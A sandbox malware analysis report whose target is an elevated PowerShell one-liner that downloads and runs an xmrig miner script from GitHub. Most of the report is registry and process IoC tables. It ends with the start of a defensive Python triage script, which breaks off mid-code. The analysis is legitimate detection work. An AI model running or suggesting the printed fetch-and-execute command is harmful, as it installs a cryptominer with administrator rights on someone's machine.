Analysis
max time kernel: 600s
max time network: 600s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 26/06/2024, 23:33
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource: win10-20240404-en
General
Target: http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Malware Config
Signatures
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | MicrosoftEdgeUpdate.exe
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation | msedgewebview2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation | msedgewebview2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation | msedgewebview2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation | msedgewebview2.exe
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Executes dropped EXE 43 IoCs
Loads dropped DLL 64 IoCs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | RobloxPlayerInstaller.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | RobloxStudioInstaller.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | RobloxStudioBeta.exe
Drops desktop.ini file(s) 1 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\Videos\Captures\desktop.ini | bcastdvr.exe
Checks system information in the registry 2 TTPs 18 IoCs
System information is often read in order to detect sandboxing environments.
Drops file in System32 directory 18 IoCs
Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
pid | Process
596 | RobloxPlayerBeta.exe
592 | RobloxPlayerBeta.exe
4844 | RobloxPlayerBeta.exe
4508 | RobloxPlayerBeta.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 8 IoCs
description | ioc | Process
File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | taskmgr.exe
File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | taskmgr.exe
File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | taskmgr.exe
File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | taskmgr.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid | Process
1640 | LaunchWinApp.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Enumerates system info in registry 2 TTPs 17 IoCs
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133639185514937027" | chrome.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | MicrosoftEdgeUpdate.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | MicrosoftEdgeUpdate.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | MicrosoftEdgeUpdate.exe
Modifies registry class 64 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ = "IAppBundle" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods\ = "4" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreMachineClass\CurVer\ = "MicrosoftEdgeUpdate.CoreMachineClass.1" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\VersionIndependentProgID | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ = "IAppCommand" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\NumMethods\ = "23" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ProxyStubClsid32\ = "{0DD41A78-E3D4-44A8-9EAE-697BCF1781A3}" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ = "IPolicyStatus" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachine.1.0\CLSID\ = "{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ = "IGoogleUpdate3" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ = "IGoogleUpdateCore" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ = "IPolicyStatus" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E3D94CEB-EC11-46BE-8872-7DDCE37FABFA}\InprocHandler32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\psmachine_64.dll" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine\CurVer\ = "MicrosoftEdgeUpdate.PolicyStatusMachine.1.0" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837} | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\ProgID | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ProxyStubClsid32\ = "{0DD41A78-E3D4-44A8-9EAE-697BCF1781A3}" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E} | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ProxyStubClsid32 | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3805CA06-AC83-4F00-8A02-271DCD89BDEB}\ = "IPolicyStatus5" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ = "IAppVersion" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ = "IAppWeb" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods\ = "41" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ = "ICoCreateAsync" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F} | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3COMClassService.1.0\CLSID | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods\ = "17" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\Elevation | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods\ = "4" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2} | MicrosoftEdgeUpdate.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6b33415f21c8da01 | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB} | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\NumMethods | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ = "IAppVersionWeb" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachineFallback\CurVer\ = "MicrosoftEdgeUpdate.PolicyStatusMachineFallback.1.0" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ = "IAppCommand" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebMachineFallback.1.0\ = "Microsoft Edge Update Update3Web" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69} | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\MicrosoftEdgeUpdateBroker.exe\"" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\msedgeupdate.dll,-1004" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods\ = "10" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.Update3WebMachineFallback" | MicrosoftEdgeUpdate.exe
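An added triage example for the two registry tables above ("Modifies data under HKEY_USERS" and "Modifies registry class"); it is written for this page and is not code from tria.ge or from any product the report names. It reads rows in the flattened "description ioc Process" form the report uses and applies the two checks a reviewer actually wants from these tables: which COM servers were registered under CLSID\...\LocalServer32, InprocServer32 or InprocHandler32, and whether their paths sit under Program Files or Windows (a server path under a user-writable directory is the COM-hijack pattern); and whether any certificate was really installed. On that second point, the HKEY_USERS table only shows Key created on store containers such as SystemCertificates\Root and TrustedPeople; an actual install writes a Blob value under <store>\Certificates\<SHA-1 thumbprint>, and nothing on this page does that. The sample rows are transcribed from the tables except the two marked hypothetical (the DEADBEEF CLSID, notreal.exe and the ROOT\Certificates blob), which are constructed so the checks have a positive case; the trusted-root list is an assumption made for the example.

```python
import re

# Constructed sample input: rows transcribed from the report's two registry tables,
# followed by two HYPOTHETICAL rows (DEADBEEF CLSID, notreal.exe, the ROOT blob) that
# are NOT on the page and exist only to show what a hit looks like.
ROWS = " ".join([
    r'Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeUpdate.exe',
    r'Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe',
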